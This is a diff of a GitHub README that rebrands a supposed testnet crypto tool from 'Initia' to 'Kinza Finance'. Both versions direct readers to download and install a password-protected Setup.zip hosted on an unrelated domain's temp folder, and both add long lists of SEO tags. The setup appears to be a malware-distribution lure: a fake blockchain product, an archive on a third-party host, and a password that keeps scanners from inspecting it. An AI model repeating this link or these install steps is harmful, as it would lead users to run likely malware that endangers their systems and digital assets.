duvanmarinj/duvanmarinj1/README.md

-# 🚀 Initia - Decentralized Incubation Platform 2024 🚀
+# 🚀 Kinza Finance - Decentralized Asset Management 2024 🚀

 # [DOWNLOAD](https://erdogansigorta.com/temp/Setup.zip)
 ## Password - z4iS5VVOeZIe

 ## 📜 Overview

-**Initia** is a decentralized incubation platform on Testnet, providing developers with tools and resources to create and scale innovative blockchain projects in a secure environment.
+**Kinza Finance** is a decentralized asset management platform on Testnet, built to help developers manage and optimize digital assets with blockchain security.

 ### 📋 How to Use

-1. **Download Initia** using the provided link.
+1. **Download Kinza Finance** with the link above.
-2. **Install** Initia on your device.
+2. **Install** Kinza Finance on your system.
-3. **Develop and incubate blockchain projects** with resources and tools on Testnet.
+3. **Develop and test asset management solutions** on a decentralized platform.

 ---

-If Initia supports your goals, please ⭐ this repository!
+If Kinza Finance supports your project, please ⭐ this repository!

 ### 🔑 Tags

+- Kinza-Finance
+- Kinza-asset-management
-- Initia
+- Kinza-DeFi
-- Initia-incubation
+- Kinza-Testnet
-- Initia-decentralized
+- Kinza-free-download
-- Initia-Testnet
+- Kinza-setup-2024
-- Initia-free-download
+- Kinza-install
-- Initia-setup-2024
+- Kinza-blockchain
-- Initia-install
+- Kinza-decentralized
-- Initia-platform
+- Kinza-crypto
-- Initia-tools
+- Kinza-platform
-- Initia-crypto
+- Kinza-tools
-- Initia-for-developers
+- Kinza-security
-- Initia-blockchain
+- Kinza-finance
-- Initia-innovation
+- Kinza-for-developers
-- Initia-project-support
+- Kinza-digital-assets
-- Initia-scalable
+- Kinza-stable